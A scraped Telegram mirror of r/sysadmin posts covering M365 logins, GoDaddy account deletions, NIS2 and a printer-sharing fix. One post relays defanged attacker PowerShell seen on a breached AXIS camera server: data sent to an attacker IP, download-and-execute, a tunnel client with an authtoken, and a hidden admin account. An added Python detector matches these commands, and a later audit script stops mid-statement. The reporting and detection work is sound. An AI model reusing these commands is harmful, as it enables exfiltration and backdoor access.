r_systemadmin | Unsorted

Telegram channel r_systemadmin - Reddit Sysadmin


Reddit SystemAdmin. Thanks @reddit2telegram and @r_channels.


Reddit Sysadmin

Issues with Microsoft 365 logins

We are getting reports of users not able to log into email. Upon investigation we are seeing users able to complete MFA and then be redirected to specifically m365.cloud.microsoft/?auth=2
And failing to redirect any further.
Going to outlook.office.com after MFA allowed the user to access email.
It seems there is something wrong with the hand off from MFA/logins to Microsoft services.

https://redd.it/1mve29d
@r_systemadmin


Reddit Sysadmin

Yealink Meeting Room Firmware sets admin password to an empty string

There was a firmware update last week (155.15.0.100) and I noticed that the time displayed was wrong. The NTP Server was still configured though…

Anyway I tried to log in to the device (local and web), but it claimed “wrong password”. I then changed the password in the Yealink Cloud but that did not work.

Turns out that somehow the “new” password is now just empty. Just press login and you are in. Anyone else experiencing this? Was the firmware update just a coincidence?

https://redd.it/1mv8v09
@r_systemadmin


Reddit Sysadmin

Then they came for IT, or pour one out?

With my job I get some information before others. One of the pieces is getting a heads up about investigations for HR etc just so we can put items on hold or set up some monitoring etc. Normally the folks are either ones I don't know or ones that in the back of my head bring a smile since they're pretty much a hole anyway. Today was different: one of my co-workers (in a different group but still IT) has the process started for them. HR reached out and asked for my part to start. There's a chance they'll survive but it's rare.

It's one of those things we talk about, and at the end of the day we know stuff like this is part of the job and even though you want to tell them to run, you can't really. It's just easier when it's someone you really are rooting to be kicked out of the building.

The only saving grace is knowing there's a reorganization coming up that is supposed to be a mess that hasn't been communicated out to everyone. At least the person won't suffer like I know we all will, dealing with that.

https://redd.it/1mv39kr
@r_systemadmin


Reddit Sysadmin

Job Hugging

I saw an article on Reddit about “Job Hugging” meaning people are clinging to their jobs out of fear with all the instability. I turned down a very, very nice opportunity for a new branch of an established company last year in the EV space and one of the driving factors of that decision was all the unknown around the EV market going into 2025. About 4 months after my would-be start date in January they shuttered all construction on the facility indefinitely and are laying off pretty much everyone including some of the people I interviewed with. I think I’ll hug my Job very tight for a while!

Bullet dodged!

https://redd.it/1muubof
@r_systemadmin


Reddit Sysadmin

Is requiring CTRL ALT DEL to logon or unlock Windows a useful security policy?

Does this still have value to mitigate Windows security threats in 2025?

https://redd.it/1munwzf
@r_systemadmin


Reddit Sysadmin

client, as the accounts are already gone.

This seems to be an edge case where someone could lose a great deal because GoDaddy deleted Microsoft accounts.

I would think there should be a well-defined way that Microsoft accounts could move from paid tenants to free accounts.

In this case, thank goodness, there were no Bitlocker'd drives or OneDrive usage or other info stored in the Microsoft accounts. The C:\User files were still there and I could recover them the hard way, as it was not possible to login to the PC. There was never a local account.

https://redd.it/1mumwfb
@r_systemadmin


Reddit Sysadmin

Shadow IT Queen Strikes Again

We set up a brand new Windows Server 2025 so everyone could work faster, safer, and from one place. Old workstations are basically thin clients now. Simple setup and takes care of a lot of "My computer is running slow" issues...

Except one user — the Shadow IT Queen. She refuses to use the server because her Chrome bookmarks weren’t there. Instead of calling me, she “fixed it herself”.

I only found out about her activity when I ran query user logs on the individual VM. When I pay a visit to her office I find out she hasn’t been saving anything to the server anyway. I have to transfer the difference, but she took care of that too... Because she’s been emailing all her files to herself.

She breaks compliance every chance she gets. Shadow IT Queen doesn’t just bend rules, she invents new ones, and new ways of doing things.

Long live the Queen...

https://redd.it/1mulz8b
@r_systemadmin


Reddit Sysadmin

If OS platforms were StarCraft races…

I was working on integrating all OS platforms into Intune (corporate, BYOD, etc.) and suddenly realized there’s a StarCraft analogy for operating systems:



Windows = Terran

The standard army. Mass-produced, flexible, built for control and infrastructure. They’re everywhere, and they dominate simply by sheer numbers and resources.



macOS = Protoss

Sleek, powerful, expensive, and extremely polished. Everything is tightly integrated and optimized. The “elite units” of the OS world



Linux (Ubuntu and friends) = Zerg

Open-source, swarming in countless variations (distros). They’re simple at the core, but extremely adaptive. And just like Zerg can overwhelm with numbers, Linux can become incredibly powerful with some good bash scripts.



BSD = Xel’Naga — the ancient, almost godlike foundation from which both macOS (Protoss) and Linux (Zerg) ultimately descend

Don't be too serious at work :)
btw, I use Arch (and prefer Warhammer40k)


https://redd.it/1mui5z8
@r_systemadmin


Reddit Sysadmin

Do logon banners have any legal weight?

You know, that "This is an ABC, Inc. computer system, unauthorized use prohibited, blah blah blah"? I hate that extra click/keypress, and I've always just kinda assumed that it had about as much legal weight as people who claim they're going to call their lawyers (that they don't have) and sue you, which is none.

https://redd.it/1mug1c9
@r_systemadmin


Reddit Sysadmin

How long does it take you to assess working for a new company?

28th year in IT. Got hired last Monday with an MSP. White Glove Service, good sales pitch.

During my onboarding, I was not provided a list of the basics. No written or online company policies. No list of products that the company uses as its standards, etc. Easy oversight. So I went to my supervisor, asked for the product list and policies. Was directed to the Ticketing System.

Digging around, notice the dates- 3 years of data, so recent migration, can't find what I need. So I pop into the President's office. Was referred to the Ticketing System.

Fine, this is a figure it out environment. So I looked at every document in the company section. Didn't take long; information does not exist. Pick some random clients and look. We are 3 hours into the day, and I have a clear picture. There is no usable documentation internally, poor client documentation, and a lack of foundation for some basic business practices.

Nope. I was not hired for this. 3 hours in..lol

Worked out the week, collected my pay, and went home.

Sent an email to the President with a list of things I would like to discuss on Monday. He replied to my personal email "This email is unexpected, extremely unprofessional, and absolutely incorrect on all counts.  Yada yada, will you be at work on Monday?". LOL you already fired me, I'm not stupid.

I have to go there, forgot my glasses. So I reply, "Sure, see you on Monday."
So when I was greeted at the door with a box for me, I was relieved, those are expensive glasses...LOL



https://redd.it/1mub8v4
@r_systemadmin


Reddit Sysadmin

What is the least irritating printer I can buy and personally use as a blind person?

I’m a half-assed sysadmin who runs some websites and plays with Linux servers for fun. I don’t know if that makes me one of you or not, but I know there are people here who have to deal with printers. (You have all of my sympathies, by the way.)

I had an HP Laserjet P1505N that has been hooked up to my Windows server for about 10 years. It finally stopped working and I honestly don’t know if I can be bothered doing the work to figure out why. If I can’t figure it out, I want a replacement that works with just as little fuss as this one does. I really don’t want to have to touchscreen my way to getting on wi-fi or whatever, because that will be the point where I’ll have to video-call someone. I need something that either has a web interface or very simple USB operation, and I’d really like the minimum number of on-device controls. Does this exist anymore, or have we reached the point where every printer has a whole operating system and UI?

tl;dr: If you already had a print server and just wanted something that would shut up and work with your print server, what would you buy?

https://redd.it/1mu4orj
@r_systemadmin


Reddit Sysadmin

Boss quit, don’t know what to do

I was hired as desktop support for my country; my boss was in the US. He was sys admin for the entire company, even giving support to everyone all day.
He hired me and another guy to do desktop support and asset management basically.
He quit because they didn’t give him the recognition he deserved and I am reporting to the VP of HR now, doing literally nothing except buying IT equipment, asset tracking and that's it, because the guy that took my boss's job/support channel is not even my boss.
I feel useless and don’t even have access to anything like Okta admin, Slack or other things to learn some sys admin skills.

I thought about talking to this new sys admin guy. Although I don't have experience I would like to be his vassal, but I don't think he has the time to explain me shit.

What tools/technologies could I learn to have some advantage in my wasted working hours?

It's a startup, security is almost non-existent and everything is kind of a mess. Most things are automated with Okta and our own CRM app.



https://redd.it/1mu10b4
@r_systemadmin


Reddit Sysadmin

What are your opinions about NIS2?

What are your opinions about the new European directive NIS2?

I will express my opinion in this post. All constructive comments and opinions are welcome.

While I think that we all recognize the importance of information and cyber security, it seems like NIS2 is close to impossible to be implemented in many organizations.
There are 3 main points that I would like to present:

1. The directive itself is extremely unclear, gives no practical measures or recommendations to be implemented. This leaves the interpretation of the directive up to the personal opinion of the people in the control organs. It is very easy to write something, while you actually say nothing. No practical measures that should be taken or clear requirements mean that no matter what measures are taken, it can always be said that the measures are inadequate. Lack of clear guidelines means high potential for corruption and using the directive in a way it was never intended to be used
2. Practical implementation of the directive when it comes to shared terminals and limited budgets is close to impossible. Many organizations use shared terminals/computers, where different shifts must use the same group of computers to do their job and perform work related tasks. In the most basic AD configuration, the user folders are located on the local computer. Imagine a computer where 10, 20 or more people log every day. Centralizing the storage of all that information is potential point of failure and would require significant amounts of storage, for example. Which leads me to the next point
3. The directive unilaterally defines what companies/enterprises/organizations fall under its scope, yet not only is the directive itself unclear, but implementing it is extremely expensive. We are talking about hardware and software, including storage, servers, software tools and so on.

As we all know, organizations that receive government funding usually receive extremely limited IT funding, if actually any. On one hand the directive demands, on the other hand a number of organizations exist that must operate, yet there is no budget to implement it. It's Catch22.
For example, all around the world, many industries and organizations use old equipment because it is prohibitively expensive to replace it. In the US there were attacks on hospitals still using WindowsXP long past its expiration date. Yet, the reason is pretty simple. Vendors of specialized equipment rarely use the latest versions of OS and software packages, because certification of such equipment is expensive. And such organizations don't replace it because it is prohibitively expensive to do so.
So, we are in a situation with no real IT budgets and no budgets to replace equipment running legacy operating systems and software, no vendors offering equipment using the latest stable and secure versions of the OS due to prohibitively expensive recertification, having extreme amounts of technical debt and no real way out for such organizations.
________________

Final thoughts - I really don't know what will happen. Is it better for example..to close almost every hospital or fine it, while the healthcare sector for example is in permanent struggle and financial deficits? And who will take care of patients and treat them if that happens? Same for most other organizations in similar situations. Rarely even the branches of the government institutions have the latest and most super-duper secure servers on premises with the latest versions of everything, as both computers and software cost money. Go to any government institution anywhere and observe with what those people are forced to work on a daily basis. So, the governments should close themselves? Or we can think of more practical and actually sound measures for cyber security that don't require external audits by companies that exist solely to leech money from the unfortunate and extort them and not to impose requirements that literally force administrations, hospitals and organizations to spend half of their total


Reddit Sysadmin

Patch your AXIS camera station servers, especially if you are using port forwarding. Sophos MDR caught and stopped malicious activity on a headless computer that was only running Camera Station.

Over the weekend I received a call from Sophos SOC. I was a little skeptical at first, but then I saw the localtonet.exe and the various commands. I also googled and found an AXIS advisory. Again, no one uses this computer. It has no keyboard or mouse and it just runs camera station. I strongly suspect this to be related to the vulnerability.

https://www.axis.com/dam/public/9b/a5/72/cve-2025-30023pdf-en-US-485733.pdf

Below is what Sophos shared. I replaced the IP address with the country of origin. We are in the U

1. Invoke-WebRequest -Headers @{"User-Agent"="$env:COMPUTERNAME"} -Uri "hxxp[://]IP in France/log" -Method Post -Body ((Get-PSDrive -PSProvider FileSystem | Select-Object Name, @{Name='Used(GB)';Expression={[math]::round($_.Used/1GB,2)}}, @{Name='Free(GB)';Expression={[math]::round($_.Free/1GB,2)}}, @{Name='Total(GB)';Expression={[math]::round($_.Used/1GB + $_.Free/1GB,2)}}) | ConvertTo-Json) -ContentType "application/json"
2. Invoke-WebRequest -Headers @{"User-Agent"="$env:COMPUTERNAME";"NUMBER_OF_PROCESSORS"="$env:NUMBER_OF_PROCESSORS";"WinVer"=(Get-WmiObject win32_operatingsystem).Caption} -Uri "hxxp[://]IP in France/log" -Method Post -Body (((Get-PSDrive -PSProvider FileSystem | Select-Object Name, @{Name = 'Used(GB)'; Expression = { [math]::round($_.Used / 1GB, 2) } }, @{Name = 'Free(GB)'; Expression = { [math]::round($_.Free / 1GB, 2) } }, @{Name = 'Total(GB)'; Expression = { [math]::round($_.Used / 1GB + $_.Free / 1GB, 2) } }), (Get-LocalUser | Select-Object Name,Enabled,Description),(Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress),(Get-WmiObject -Class Win32_ComputerSystem | Select-Object -Property Manufacturer,Model,Domain,Name,DNSHostName,UserName,PrimaryOwnerName,HypervisorPresent) ) | ConvertTo-Json) -ContentType "application/json"
3. Invoke-Expression(IRM -Headers @{"User-agent"="$env:COMPUTERNAME/$env:USERNAME"} "hxxp[://]IP in France/script")
4. cd $env:temp; IWR hxxps[://]localtonet[.]com/download/localtonet-win-64[.]zip -OutFile localtonet[.]zip; Expand-Archive localtonet[.]zip -DestinationPath .; .\localtonet[.]exe authtoken buqCDfHX57A08jnrV1MpGcJTByo2KgmNz
5. Invoke-Expression(IRM -Headers @{"User-agent"="$env:COMPUTERNAME/$env:USERNAME"} "hxxp[://]IP in France/script")
6. cd $env:temp; IWR hxxps[://]localtonet[.]com/download/localtonet-win-64[.]zip -OutFile localtonet[.]zip; Expand-Archive localtonet[.]zip -DestinationPath .; .\localtonet[.]exe authtoken buqCDfHX57A08jnrV1MpGcJTByo2KgmNz



Observed Commands: a few of them for the user 'AXIS'

"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\Userlist /t REG_DWORD /d 0 /f /v AXIS

"C:\Windows\system32\net.exe" localgroup Administrateurs /add AXIS

"C:\Windows\system32\net.exe" localgroup "Remote Desktop Users" /add AXIS

C:\Windows\system32\net1 localgroup "Remote Desktop Users" /add AXIS

C:\Windows\system32\net1 user AXIS /active:yes

https://redd.it/1mtt93k
@r_systemadmin
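
The command lines quoted in the post above map onto a handful of behaviours that can be hunted for in process-creation logs: an account hidden from the logon screen, added to a privileged local group, re-enabled, plus download-and-execute and a tunnel client start. The following is an added example, not part of the original post or of Sophos's output; the hostnames, sample events, tag names, the 203.0.113.10 address and the placeholder token are constructed.

```python
import re
from collections import defaultdict

# Local groups whose membership grants admin or RDP access. "Administrateurs"
# is the French-localised group name that appears in the quoted commands.
PRIV_GROUPS = {"administrators", "administrateurs", "remote desktop users"}

RE_REG_HIDE = re.compile(r'\breg(?:\.exe)?"?\s+add\s+.*\\SpecialAccounts\\UserList\b', re.I)
RE_REG_ZERO = re.compile(r'\s/d\s+0\b', re.I)            # value 0 = hide from logon UI
RE_REG_NAME = re.compile(r'\s/v\s+"?([^"\s]+)', re.I)    # value name = account name
RE_LOCALGROUP = re.compile(r'\bnet1?(?:\.exe)?"?\s+localgroup\s+("[^"]+"|\S+)\s+(.+)$', re.I)
RE_USER_ON = re.compile(r'\bnet1?(?:\.exe)?"?\s+user\s+"?([^"\s/]+)"?\s.*?/active:yes\b', re.I)
RE_DL_EXEC = re.compile(
    r'\b(?:invoke-expression|iex)\b.*\b(?:irm|invoke-restmethod|iwr|invoke-webrequest)\b', re.I)
RE_TUNNEL = re.compile(r'\blocaltonet(?:\.exe)?\b.*\bauthtoken\b', re.I)


def normalize(cmdline):
    """Collapse doubled backslashes, as seen when telemetry is JSON- or markdown-escaped."""
    return cmdline.replace("\\\\", "\\").strip()


def classify(cmdline):
    """Return a list of (tag, account_or_None) for one process command line."""
    cmd = normalize(cmdline)
    hits = []
    if RE_REG_HIDE.search(cmd) and RE_REG_ZERO.search(cmd):
        m = RE_REG_NAME.search(cmd)
        hits.append(("hidden_account", m.group(1) if m else None))
    m = RE_LOCALGROUP.search(cmd)
    if m:
        group = m.group(1).strip('"').lower()
        rest = m.group(2).split()
        names = [t.strip('"') for t in rest if not t.startswith("/")]
        is_add = any(t.lower() == "/add" for t in rest)
        if group in PRIV_GROUPS and is_add and names:
            hits.append(("priv_group_add", names[0]))
    m = RE_USER_ON.search(cmd)
    if m:
        hits.append(("account_enabled", m.group(1)))
    if RE_DL_EXEC.search(cmd):
        hits.append(("download_exec", None))
    if RE_TUNNEL.search(cmd):
        hits.append(("tunnel_client", None))
    return hits


def triage(events):
    """Group hits per host and name accounts that were both hidden and privileged."""
    per_host = defaultdict(lambda: {"tags": set(), "accounts": defaultdict(set)})
    for ev in events:
        for tag, account in classify(ev["cmdline"]):
            host = per_host[ev["host"]]
            host["tags"].add(tag)
            if account:
                host["accounts"][account.upper()].add(tag)
    report = {}
    for name, data in per_host.items():
        backdoors = sorted(a for a, tags in data["accounts"].items()
                           if {"hidden_account", "priv_group_add"} <= tags)
        report[name] = {"tags": sorted(data["tags"]), "backdoor_accounts": backdoors}
    return report


# Constructed process-creation events. The CAMSRV01 lines mirror the shape of the
# commands quoted in the post; the WS-0042 lines are benign look-alikes.
SAMPLE_EVENTS = [
    {"host": "CAMSRV01", "cmdline": r'"C:\\Windows\\system32\\reg.exe" add HKEY_LOCAL_MACHINE'
     r'\\Software\\Microsoft\\WindowsNT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist'
     r' /t REG_DWORD /d 0 /f /v AXIS'},
    {"host": "CAMSRV01", "cmdline": r'"C:\Windows\system32\net.exe" localgroup Administrateurs /add AXIS'},
    {"host": "CAMSRV01", "cmdline": r'C:\Windows\system32\net1 localgroup "Remote Desktop Users" /add AXIS'},
    {"host": "CAMSRV01", "cmdline": r'C:\Windows\system32\net1 user AXIS /active:yes'},
    {"host": "CAMSRV01", "cmdline": 'powershell.exe Invoke-Expression(IRM "http://203.0.113.10/script")'},
    {"host": "CAMSRV01", "cmdline": r'.\localtonet.exe authtoken PLACEHOLDER_TOKEN'},
    {"host": "WS-0042", "cmdline": 'net localgroup "Remote Desktop Users"'},
    {"host": "WS-0042", "cmdline": r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"'},
]

if __name__ == "__main__":
    for host, result in triage(SAMPLE_EVENTS).items():
        print(host, result)
```

Feed it command lines exported from Sysmon Event ID 1 or Security Event ID 4688 (with command-line auditing enabled); a host that reports a `backdoor_accounts` entry deserves the same account review the post describes.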


Reddit Sysadmin

Helpdesk dude doing Linux work - need help

I started my first IT job a month and a half ago, my only prior experience was IT Technical High School, in which I learned a couple of basic things, and I also did some home labbing in my free time. I was asked to look into our Apache server and fix some recurring outage, and I did it. Now I'm getting assigned more Linux related tasks. I really want to learn something and I think Linux would be a great career specialization. I need some tips for a fresh guy. I feel really incompetent.

What things I should look out for? Are there any must-read books or great videos to watch? Can I do anything to make myself look (and feel) less incompetent? How can I learn Linux administration in a reasonable pace?

Any tips greatly appreciated.

https://redd.it/1mtqyj6
@r_systemadmin


Reddit Sysadmin

“7 Months of Microsoft 365 Support Tickets = Silence, Bounce Backs, $50k+ Loss”

I’m a solo business owner whose entire workflow depends on Microsoft 365 email. For 7+ months I’ve been stuck in what feels like a Groundhog Day support loop — dozens of tickets, no resolution, and escalating financial damage.

Here’s the short version of what’s happened:
• Tickets dropped or archived as duplicates without action.
• Escalations never executed — even when explicitly requested (e.g., case 2506130040004496 was never sent to Sender Reputation or Security Engineering).
• Same data requested over and over despite full compliance each time.
• Critical evidence ignored: non-Gmail addresses are also bouncing, but agents keep framing this as “just Gmail filtering.”
• Support silo chaos: Riya, Migz, Abhilash, Daril, Ayodele, Vedent — all separate agents, no alignment.
• 7 months of delay with no escalation path, leaving me to act as my own IT department.

Impact:
• Over $50,000 in lost business opportunities.
• My reputation with clients damaged by bounced emails.
• I’ve spent countless hours in support purgatory instead of running my business.

At this point, it feels like a case study in how siloed, non-narrative support systems can ruin small operators.

Has anyone else been trapped in a Microsoft 365 support hamster wheel like this? Any advice on how to break through, or escalate outside the endless ticket cycle? Of course, at the end of each ticket I’ve asked to collate combine, ticket #’s escalate, etc. but the protocols do not seem to incentivize collaboration.



https://redd.it/1mv6s39
@r_systemadmin


Reddit Sysadmin

WSUS, anyone else's gone mad yesterday?

I have a very simple Server 2022 WSUS server.

Yesterday I got a disk space alert for it which was strange as it usually has lots of spare space and the sync is early AM and the disk alert was mid afternoon.

It looks like it was re-downloading a TON of content from Microsoft's Fastly CDN IPs.

Literally nobody here has touched it to approve anything and it looks like it's now using around 75% more space than it was and I have no idea why.

It's not a big issue but did anyone else see anything similar please?

Jas

https://redd.it/1mv8513
@r_systemadmin


Reddit Sysadmin

GA- Tenant *Poof* Gone

Our org is at a standstill. None of our apps or partners/consultants are able to contact or connect to our tenant or any apps. There are NO logins being processed for any account- and therefore no MS/SSO/Etc. It appears that somehow our Azure/Entra Global Admin is somehow no longer attached to the tenant. Our CSP cannot access our tenant and Microsoft is... mostly being Microsoft. Has anyone else dealt with this? We have slowly over the last 6 years or so moved nearly 85-90% off-prem. And this is what the C-suite feared in doing so.

Is this a "compromise" and our tenant is being held hostage or just "Oops, I deleted it on accident? -CoPilot"

*edit- verbiage, grammar

https://redd.it/1musfuy
@r_systemadmin


Reddit Sysadmin

VP Wants easy way to search all teams' messages

My VP wants the ability to search through all Teams messages for our tenant.
We have O365 Basic for most users.
I know you can do it using ediscovery, but it's clunky and slow.


Any suggestions?

https://redd.it/1murjvm
@r_systemadmin


Reddit Sysadmin

AITA

Last night I got a call after hours which I ignored, as the user is not utilizing any vital applications and this is a normal occurrence for help desk items (which do not pertain to me).

She sent an email asking for documentation that was sent a couple months ago via email (every dept has their own SharePoint and are responsible for their documents).

I replied this morning with the document and a screenshot of when it was sent. As well as a friendly reminder that they have a SharePoint, also how to search Outlook on the search bar.

She came back so mad and upset and said that I am in the "service industry" and it doesn't matter what she wants I must provide it to her no matter if it was previously sent. Blah blah blah

I probably shouldn't have sent the screenshot/instructions but I honestly didn't know if she knew how to search Outlook. Heck I showed her how to create bookmarks on Chrome last month and she's been working at the same place for 20 years...

AIYTA?

https://redd.it/1mup6nh
@r_systemadmin


Reddit Sysadmin

GoDaddy deleted paid M365 accounts because users switched email to Google Workspace?

tl;dr: Why did GoDaddy delete the Microsoft M365 accounts my client is still paying for?

A newer client called me on 8/13/2025, said they couldn't login to their Windows 11 PC. Small business, not a domain, not even really a workgroup. They were logging in to the PC with their Microsoft account.

They'd bought their new domain name at GoDaddy a year or so ago, before I'd ever helped them. They bought GoDaddy's "Microsoft 365 Secure Business Professional" for three users as "Microsoft 365 Email Plus with Security," which created three Microsoft accounts like user@theirdomain.com, with M365 email services at each email address. These were annual subscriptions, paid up through 10/22/2025. They'd set up new PCs with these Microsoft accounts.

On 6/26/2025, they needed to switch to a new CRM that required Google email. They called me to do the migration. I switched their MX records and migrated their email without a hitch, it's been working fine ever since.

On 8/13/2025, the user@theirdomain.com Microsoft account seemed to be gone. Attempting a login at Office.com says the password is incorrect, clicking "reset the password" redirected to the GoDaddy SSO page, which said the account does not exist.

I argued with GoDaddy support for a good 90 minutes, asking them why they deleted the underlying Microsoft accounts. All we'd done on 6/26 was shift the MX records, which GoDaddy does not control. The name servers are at yet another company that manages their web site. GoDaddy still controlled the tenant for M365, as shown by the redirection to their SSO page.

For the first 60 minutes of the call, GoDaddy said they had to delete the accounts because you can't have email services in two places. This did not make sense to me, as I believe the MX records are the deciding factor. The client was still paying for the GoDaddy M365 email service, but was not using that, (nor even using Office,) but they were relying on the underlying Microsoft accounts to login to their PC.

Around 60 minutes in, the GoDaddy support tech began to claim that he'd found a note on the account that said that Google had deleted the four Microsoft accounts on 7/7/2025, which did not make sense to me. I asked "how?" and "why?" and they had no answer, but they suggested I needed to talk to Google. Of course, I asked Google and they said they had not done anything like that, nor could they.

I don't see what would break for GoDaddy because they noticed that the MX records had changed and that a Google domain ownership verification TXT was present in DNS. I don't see why they would cancel services that are paid-up until 10/22.
The product is still there in the client's GoDaddy account, but there's nothing to manage because the Microsoft accounts are gone.

I don't see what would break for Google if the Microsoft accounts still existed, nor can I imagine that they had a way to reach into GoDaddy's tenancy and delete Microsoft accounts. I'm surprised that the PC login continued to work from 7/7 to 8/13.

At the end of the GoDaddy call, I asked them to release the M365 tenant. I presumed this defederation would at least stop the redirection through the GoDaddy SSO and offer a chance to create new Microsoft accounts at the domain. Indeed, now at Office.com, the initial login says the account does not exist.

I found many descriptions of how to defederate from GoDaddy M365. They all expected you'd be renewing M365 either direct or with another provider, which would imply the underlying Microsoft accounts would continue to exist. I did not find any guides that described how to stop the M365 subscription and yet retain the underlying Microsoft accounts.

I thought I had until 10/22 to decide how to handle that aspect. There is no need for this client to continue M365 for Office or email, but Microsoft certainly likes users to have a (free) Microsoft account with the username as an email address. It's a moot point for this


Reddit Sysadmin

How does your org structure IT & Security?

Most of my experience comes from SMB orgs where all SecOps responsibilities fell to the sysadmins. We'd work with internal auditors to meet compliance frameworks, but that was about the extent of it. How are y'all doing it? It feels like every company draws the lines differently.

I've seen some places where Security is its own separate team with its own leadership chain, reporting up to a CISO. At others, Security and sysadmins falls under the same IT leadership. I would think keeping things under the same team would be more efficient and less confrontational when things like false positives come up, but I could be totally wrong here.

Also, do your security team members actually "do the thing" or do they just report it? If they just report the security finding and CVEs, does that make it better, or does that cause friction because it's just one more department requesting things from IT?

So I’m curious, in your org, is it:

IT and Security (two completely separate teams)?

IT with Security (one team to rule them all)?

Or is it just you or a small team of sysadmins wearing all the hats?

If you’ve worked in more than one setup, which one actually worked best in practice and why?

https://redd.it/1muhnbn
@r_systemadmin


Reddit Sysadmin

r/ceph banned ?

so /r/ceph got banned ? rule 2 ? anyone know what happened ? any /r/ceph mods around that could appeal ? sucks to lose a technical subreddit

https://redd.it/1muftg1
@r_systemadmin


Reddit Sysadmin

Best practice for running a detection as user but remediation as Admin (Intune)

So in my work environment, I've noticed that we have two sets of Edge installed on the majority of EU devices. This means that only one version is being updated regularly. The stable version appears to be pushed out via our Windows Autopatch groups; however, our patch management solution seems to update clients to the beta version of Edge. Because of this, the stable version is usually left on the device, but as an old version. Which then flags as an issue from a CS standpoint.


I had in mind to write a detection script to locate if Edge Stable was installed, and if it was under a certain version (eg 138.x), then it would remove the appx package, leaving the beta version, which is up to date. I have written and tested the detection script, and this works without issue; however, this only works at the user level. Meaning I have to run it with the logged-on credentials to ensure Intune can find the Appx package when running the script. However, to then remove the appx package, this requires system permissions. I have tried to adjust my script to allow searching as the user, but this just returns no issues.


Would best practice simply be deploying a Win32 app to delete any version LT 138.x, or is there a simpler way to detect and delete that I am missing? I have tried to find similar cases to what I am experiencing, but they all differ in large ways.


Any help is much appreciated.

https://redd.it/1mucp4n
@r_systemadmin


Reddit Sysadmin

Win11 24H2 Printer Sharing Fix

I made this script to help myself and others out there to fix the issue with Win11 24H2 printer sharing.

I was getting the error 0x00000709 before this fix.

Setup:

1. Win11 computer with shared printer (server)
2. Win11 computers as clients
3. Win10 computers as clients

Before running the batch file, I did the following:

1. Set network type to Private
2. Enabled network discovery, file and printer sharing
3. Disabled public folder sharing, password protected sharing

Made the batch file below and ran it as admin on both client and server computers.

Restarting may be needed but in my case I didn't need to (your mileage may vary)


Any feedback to improve the script will be appreciated

@echo off
:: =========================================
:: Configure RPC for Printers with Fixed Port
:: =========================================
echo ===================================
echo Windows 11 24H2 RPC with fixed port
echo ===================================
echo.

:: Set a fixed port (example: 601)
echo Setting RpcTcpPort to 601
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\RPC" /v RpcTcpPort /t REG_DWORD /d 601 /f
echo.

:: Configure RPC protocol settings
echo Registry entry: RpcUseNamedPipeProtocol = 1
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\RPC" /v RpcUseNamedPipeProtocol /t REG_DWORD /d 1 /f
echo.
echo Registry entry: RpcProtocols = 0x7
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\RPC" /v RpcProtocols /t REG_DWORD /d 0x7 /f
echo.
echo Registry entry: ForceKerberosForRpc = 0
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\RPC" /v ForceKerberosForRpc /t REG_DWORD /d 0 /f
echo.

:: Add firewall rule for port 601 if it does not already exist
netsh advfirewall firewall show rule name="Print-RPC 601" >nul 2>&1
if errorlevel 1 (
    echo Adding firewall rule: Print-RPC 601
    netsh advfirewall firewall add rule name="Print-RPC 601" dir=in action=allow protocol=TCP localport=601 profile=private
) else (
    echo Firewall rule "Print-RPC 601" already exists
)

:: Add firewall rule for endpoint mapper (135) if it does not already exist
netsh advfirewall firewall show rule name="Print-RPC Endpoint Mapper" >nul 2>&1
if errorlevel 1 (
    echo Adding firewall rule: Print-RPC Endpoint Mapper
    netsh advfirewall firewall add rule name="Print-RPC Endpoint Mapper" dir=in action=allow protocol=TCP localport=135 profile=private
) else (
    echo Firewall rule "Print-RPC Endpoint Mapper" already exists
)

:: Restart the Print Spooler service
echo.
echo Restarting Print Spooler...
net stop spooler >nul 2>&1
net start spooler
echo.
echo Done! Printer RPC settings have been configured.
pause

https://redd.it/1mu987n
@r_systemadmin
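
A read-only check for what the batch file above configures, as an added example that is not part of the original post: it reports the four registry values, the two firewall rules and whether the spooler owns the TCP 601 listener. The registry key, values, port and rule names come from the post; the check labels, the output layout and the expectation that the spooler listens on 601 on the sharing machine are this example's assumptions.

```powershell
# Added example (not from the original post): audit only, changes nothing.
$rpcKey   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\RPC'
$expected = [ordered]@{                      # values written by the post's script
    RpcTcpPort              = 601
    RpcUseNamedPipeProtocol = 1
    RpcProtocols            = 7
    ForceKerberosForRpc     = 0
}
$ruleNames = 'Print-RPC 601', 'Print-RPC Endpoint Mapper'   # rule names from the post

# 1. Registry policy values: flag anything missing or different.
$props = Get-ItemProperty -Path $rpcKey -ErrorAction SilentlyContinue
foreach ($name in $expected.Keys) {
    $actual = $null
    if ($props -and $props.PSObject.Properties[$name]) { $actual = $props.$name }
    [pscustomobject]@{
        Check    = "Registry: $name"
        Expected = $expected[$name]
        Actual   = $actual
        Ok       = ($null -ne $actual -and $actual -eq $expected[$name])
    }
}

# 2. Firewall rules: present, enabled, inbound allow, scoped to the Private profile only.
foreach ($ruleName in $ruleNames) {
    $rule = Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue |
            Select-Object -First 1
    $state = $null
    if ($rule) {
        $port  = ($rule | Get-NetFirewallPortFilter).LocalPort
        $state = "$($rule.Enabled), $($rule.Direction), $($rule.Action), $($rule.Profile), port $port"
    }
    [pscustomobject]@{
        Check    = "Firewall: $ruleName"
        Expected = 'True, Inbound, Allow, Private'
        Actual   = $state
        Ok       = [bool]($rule -and $rule.Enabled -eq 'True' -and $rule.Direction -eq 'Inbound' -and
                          $rule.Action -eq 'Allow' -and $rule.Profile -eq 'Private')
    }
}

# 3. Assumption: on the machine sharing the printer, the spooler process owns the 601 listener.
$spooler = Get-CimInstance -ClassName Win32_Service -Filter "Name='Spooler'"
$listen  = Get-NetTCPConnection -State Listen -LocalPort 601 -ErrorAction SilentlyContinue |
           Select-Object -First 1
$owner = $null
if ($listen) { $owner = "PID $($listen.OwningProcess)" }
[pscustomobject]@{
    Check    = 'Listener: TCP 601 owned by spooler'
    Expected = "PID $($spooler.ProcessId)"
    Actual   = $owner
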